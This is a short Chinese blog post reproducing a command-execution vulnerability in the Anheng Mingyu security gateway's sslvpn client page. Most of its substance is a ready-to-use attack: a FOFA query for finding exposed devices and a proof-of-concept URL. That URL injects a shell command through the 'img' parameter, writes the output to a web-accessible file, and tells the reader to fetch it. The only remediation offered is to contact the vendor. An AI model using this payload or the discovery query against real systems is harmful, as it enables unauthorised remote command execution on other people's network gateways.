【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞

晚风不及你ღ2024-03-06 21:17

Nx01 产品简介

明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。

Nx02 漏洞描述

明御安全网关存在sslvpn命令执行漏洞,攻击者可通过此漏洞获取服务器控制权限。

Nx03 产品主页

fofa-query: web.body="明御安全网关"

Nx04 漏洞复现

POC:

复制代码 
/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls

拼接URL/sslvpn/ceshi.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
fmingzh29 分钟前
NVIDIA高级辅助驾驶安全与技术读后感
人工智能·安全·自动驾驶
Zz_waiting.1 小时前
网络原理 - 10(HTTP/HTTPS - 1)
网络·http·https
Blossom.1181 小时前
量子网络:构建未来通信的超高速“高速公路”
网络·opencv·算法·安全·机器学习·密码学·量子计算
落——枫1 小时前
网络安全知识点3
安全·web安全
柴郡猫^O^2 小时前
OSCP - Proving Grounds - Wpwn
安全·网络安全·安全性测试
安全系统学习2 小时前
网络安全之红队LLM的大模型自动化越狱
运维·人工智能·安全·web安全·机器学习·php
洁✘2 小时前
web基础与http协议
网络·网络协议·http
想睡好3 小时前
以太网的mac帧格式
网络·macos
曼诺尔雷迪亚兹3 小时前
Wireshark快速入门--对启动的后端程序进行抓包
网络·测试工具·wireshark
FreeBuf_4 小时前
新型“电力寄生虫“网络钓鱼攻击瞄准能源企业与知名品牌
网络·php·能源
热门推荐
01西电B测-计算机网络综合实验(含验收问题)02KGG转MP3工具|非KGM文件|解密音频03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04Coze扣子平台完整体验和实践(附国内和国际版对比)05YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】06DeepSeek各版本说明与优缺点分析07最新 Kubernetes 集群部署 + flannel 网络插件(保姆级教程,最新 K8S 版本)08yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记09我决定放弃搞 Java 了10yolov10来了!用yolov10训练自己的数据集(原理、训练、部署、应用)